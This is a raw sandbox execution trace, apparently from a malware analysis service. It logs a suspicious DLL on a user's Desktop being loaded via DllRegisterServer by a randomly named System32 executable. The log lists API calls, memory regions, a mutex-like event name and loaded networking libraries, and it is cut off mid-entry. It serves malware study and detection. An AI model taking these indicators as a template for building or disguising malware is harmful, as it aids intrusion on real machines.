[0036.714] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0036.714] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0036.714] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0036.714] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0036.714] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0036.714] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0036.714] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0036.714] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0036.715] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0036.715] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0036.715] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0036.715] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0036.715] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0036.715] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0036.715] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0036.715] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0036.715] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0036.715] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0036.715] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0036.715] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0036.715] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0036.715] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0036.715] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.715] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.715] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.715] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0036.717] HeapDestroy (hHeap=0x490000) returned 1 Process: id = "70" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fb80" os_pid = "0xe98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllRegisterServer /fn_args=\"%Temp%\\IXP000.TMP\\\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3066 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3067 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3068 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3069 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3070 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 3071 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3072 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3073 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3074 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 3075 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 3076 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3077 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3078 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 3079 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3080 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3081 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3082 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3083 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3084 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3085 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3086 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3087 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3088 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3089 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3090 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3091 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 3092 start_va = 0x500000 end_va = 0x5c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 3093 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3094 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3095 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3096 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 3097 start_va = 0x5d0000 end_va = 0x6d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 3098 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 3099 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3100 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 3101 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3102 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3103 start_va = 0x6e0000 end_va = 0x87ffff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 3104 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3105 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3106 start_va = 0xd0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Thread: id = 157 os_tid = 0xe9c [0036.766] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fb8c | out: lpSystemTimeAsFileTime=0x26fb8c*(dwLowDateTime=0xe398aff0, dwHighDateTime=0x1d3dfba)) [0036.766] GetCurrentProcessId () returned 0xe98 [0036.766] GetCurrentThreadId () returned 0xe9c [0036.766] GetTickCount () returned 0x184e7 [0036.766] QueryPerformanceCounter (in: lpPerformanceCount=0x26fb84 | out: lpPerformanceCount=0x26fb84*=379030925) returned 1 [0036.767] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.767] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0036.767] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0036.767] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0036.767] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0036.767] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.767] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.767] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.767] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.767] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.767] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.767] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.767] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.767] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.767] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.768] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.768] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.768] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.768] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.768] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.768] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.768] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.769] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.769] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.769] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.769] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.769] GetCurrentThreadId () returned 0xe9c [0036.769] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllRegisterServer /fn_args=\"%Temp%\\IXP000.TMP\\\"" [0036.769] GetEnvironmentStringsW () returned 0x347998* [0036.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0036.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x8709f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0036.769] FreeEnvironmentStringsW (penv=0x347998) returned 1 [0036.769] GetStartupInfoA (in: lpStartupInfo=0x26fadc | out: lpStartupInfo=0x26fadc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0036.769] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0036.769] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0036.769] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0036.769] SetHandleCount (uNumber=0x20) returned 0x20 [0036.769] GetLastError () returned 0x0 [0036.769] SetLastError (dwErrCode=0x0) [0036.769] GetLastError () returned 0x0 [0036.770] SetLastError (dwErrCode=0x0) [0036.770] GetLastError () returned 0x0 [0036.770] SetLastError (dwErrCode=0x0) [0036.770] GetACP () returned 0x4e4 [0036.770] GetLastError () returned 0x0 [0036.770] SetLastError (dwErrCode=0x0) [0036.770] IsValidCodePage (CodePage=0x4e4) returned 1 [0036.770] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x26fabc | out: lpCPInfo=0x26fabc) returned 1 [0036.770] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x26f588 | out: lpCPInfo=0x26f588) returned 1 [0036.770] GetLastError () returned 0x0 [0036.770] SetLastError (dwErrCode=0x0) [0036.770] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x26f518 | out: lpCharType=0x26f518) returned 1 [0036.770] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f99c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.770] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f99c, cbMultiByte=256, lpWideCharStr=0x26f308, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0036.770] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x26f59c | out: lpCharType=0x26f59c) returned 1 [0036.770] GetLastError () returned 0x0 [0036.770] SetLastError (dwErrCode=0x0) [0036.770] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0036.770] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f99c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.770] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f99c, cbMultiByte=256, lpWideCharStr=0x26f2d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.770] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0036.770] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x26f0c8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.770] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x26f89c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x04*îõÔú&", lpUsedDefaultChar=0x0) returned 256 [0036.770] GetLastError () returned 0x0 [0036.770] SetLastError (dwErrCode=0x0) [0036.770] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f99c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.770] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f99c, cbMultiByte=256, lpWideCharStr=0x26f2f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.770] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0036.770] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 